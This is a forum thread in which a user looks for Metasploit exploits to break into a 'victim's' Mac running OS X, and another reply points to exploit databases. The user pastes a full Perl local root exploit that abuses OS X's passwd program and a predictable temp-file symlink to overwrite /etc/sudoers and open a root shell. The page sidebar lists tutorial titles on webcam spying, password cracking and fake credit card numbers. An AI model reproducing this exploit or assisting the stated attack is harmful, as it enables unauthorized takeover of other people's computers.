Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
Why Do I Want to Be a Hacker? (For Newbies) 2017
4
Replies
2 hrs ago -
Forum Thread:
MSF Handler Failed Bind to External Ip
3
Replies
13 hrs ago -
Forum Thread:
How Can Hack Someones Android Phone in Same Wifi Network???
4
Replies
14 hrs ago -
Forum Thread:
Exploit Failed [Bad-Config] Rex::Bindfailed
2
Replies
20 hrs ago -
Forum Thread:
[Problem] Meterpreter, Migrate and Antivirus
3
Replies
20 hrs ago -
Forum Thread:
I Can't Hack Anything with Metasploit
5
Replies
21 hrs ago -
Forum Thread:
I'm Having Trouble with Metasploit
5
Replies
22 hrs ago -
Forum Thread:
Windows 10 Exploits
14
Replies
1 day ago -
Forum Thread:
Hacking into Whatsapp Series, Part 2: Phishing.
1
Replies
1 day ago -
Forum Thread:
Need Drivers for TP-Link TL-WN722N on Android.
1
Replies
2 days ago -
Forum Thread:
ZIP Files Sometimes Gives an Error
3
Replies
2 days ago -
Forum Thread:
Error When Opening Excel Files
0
Replies
2 days ago -
Forum Thread:
How to Encrypt a Shellcode ?
0
Replies
3 days ago -
Forum Thread:
Using a Wireless USB Adapter in Kali 2.0
6
Replies
4 days ago -
Forum Thread:
Hacking Android Problem!
4
Replies
4 days ago -
Forum Thread:
How to Use NGROK in a Reverse_Tcp Attack?
6
Replies
4 days ago -
Forum Thread:
How to Really Become Pro Hacker ?
5
Replies
5 days ago -
Forum Thread:
Efficient Python Based Crawler
0
Replies
5 days ago -
Forum Thread:
How to Make the Raspberry Pi Zero W into a Usb Rubber Ducky?
5
Replies
5 days ago -
Forum Thread:
DNS Spoofing Doesn't Work
1
Replies
6 days ago
-
How to Use PowerShell Empire:
Getting Started with Post-Exploitation of Windows Hosts
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How To:
Simulate a RAT on Your Network with ShinoBOT
-
How to Hack Wi-Fi:
Build a Software-Based Wi-Fi Jammer with Airgeddon
-
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How To:
Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
-
How To:
Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux
-
How To:
Successfully Hack a Website in 2016!
-
How To:
Set Up SoftEther VPN on Windows to Keep Your Data Secure
-
How to Hack Wi-Fi:
Capturing WPA Passwords by Targeting Users with a Fluxion Attack
-
How To:
Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
How To:
Hack Android Using Kali (Remotely)
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
Hack Like a Pro:
How to Secretly Hack Into, Switch On, & Watch Anyone's Webcam Remotely
-
Hack Like a Pro:
How to Find Vulnerabilities for Any Website Using Nikto
-
Hack Like a Pro:
How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite
-
Hack Like a Pro:
How to Spy on Anyone, Part 1 (Hacking Computers)
-
How To:
Install OpenVAS for Broad Vulnerability Assessment
-
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
-
How To:
Hack WPA WiFi Passwords by Cracking the WPS PIN
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts